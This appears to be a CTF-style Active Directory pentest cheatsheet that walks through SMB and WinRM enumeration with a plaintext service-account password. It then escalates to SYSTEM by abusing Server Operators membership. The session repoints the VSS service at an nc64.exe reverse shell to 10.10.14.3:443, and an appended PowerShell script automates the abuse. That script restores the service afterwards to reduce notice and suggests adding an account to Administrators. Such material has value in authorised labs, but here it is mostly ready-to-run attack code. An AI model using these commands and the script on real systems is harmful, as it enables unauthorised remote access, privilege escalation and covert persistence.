
AD-Cheatsheet


Recon

Scan

crackmapexec

  • Check SMB shares (unauthenticated first, then with the credentials)
crackmapexec smb 10.10.11.108 --shares
crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'
  • Check WinRM (confirms the account can open a remote PowerShell session)
crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Exploit

WinRM

evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Privilege Escalation

See priv

whoami /priv

Group priv

Server Operators

  • Members can change the configuration of existing services (sc config) and start or stop them. Repointing a service that runs as LocalSystem, such as VSS, at an attacker-controlled binary runs that binary as SYSTEM the next time the service is started.

Reference: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

PS C:\prog> sc.exe config VSS binpath="C:\windows\system32\cmd.exe /c C:\prog\nc64.exe -e cmd 10.10.14.3 443"
[SC] ChangeServiceConfig SUCCESS
PS C:\prog> sc.exe stop VSS
[SC] ControlService FAILED 1062:

The service has not been started.

PS C:\prog> sc.exe start VSS

Error 1062 on the stop is harmless: it only means VSS was not running, so there is nothing to stop. The start will report error 1053 (the payload never registers with the Service Control Manager, so the start request times out), but by then the Service Control Manager has already launched the payload as SYSTEM and the listener on 10.10.14.3:443 receives the shell.
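The same Server Operators abuse as a reusable PowerShell script, added here as a worked example and not part of the original post. It checks group membership, saves the service's original binPath so VSS can be put back afterwards, points the service at the payload and starts it. The service name, payload path and listener address are the ones from the session above; the parameter names and the SID check are this example's own.

```powershell
# Added example (not from the original page): abuse Server Operators membership
# to run a payload as SYSTEM through an existing LocalSystem service.
# Assumptions: service name, payload path and listener 10.10.14.3:443 are taken
# from the page's session; $ServiceName/$Payload are illustrative parameter names.
param(
    [string]$ServiceName = 'VSS',
    [string]$Payload = 'C:\windows\system32\cmd.exe /c C:\prog\nc64.exe -e cmd 10.10.14.3 443'
)

# 1. Make sure the current token actually carries Server Operators (well-known SID S-1-5-32-549)
#    before touching any service configuration.
$groups = whoami /groups
if (($groups -match 'S-1-5-32-549').Count -eq 0) {
    Write-Error 'Current user is not a member of Server Operators'
    return
}

# 2. Record the original binary path so the service can be restored afterwards.
$qc = sc.exe qc $ServiceName
$origBinPath = ($qc | Select-String 'BINARY_PATH_NAME\s*:\s*(.+)$').Matches[0].Groups[1].Value.Trim()
Write-Host "[*] $ServiceName original binPath: $origBinPath"

# 3. Point the service at the payload. In documented sc.exe syntax the space after 'binPath=' is
#    required; PowerShell passes $Payload as a single quoted argument even though it contains spaces.
sc.exe config $ServiceName binPath= $Payload

# 4. Start it. Stopping first only matters if the service is already running (otherwise error 1062).
#    The start reports error 1053 because the payload never talks to the Service Control Manager,
#    but the SCM has already spawned it as SYSTEM by then.
sc.exe stop $ServiceName | Out-Null
sc.exe start $ServiceName

# 5. Put the original configuration back so VSS keeps working and the change is less conspicuous.
sc.exe config $ServiceName binPath= $origBinPath
Write-Host "[*] $ServiceName binPath restored"
```

Run it from the evil-winrm session as svc-printer with a listener already waiting on 10.10.14.3:443. Because the SCM treats the payload as a service that failed to start, it may terminate the spawned process once it reports 1053, so collect what you need from the shell quickly or use a payload whose effect outlives the process (adding an account to Administrators, for instance) rather than relying on the reverse shell staying up.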

Other Tools


This post is licensed under CC BY 4.0 by the author.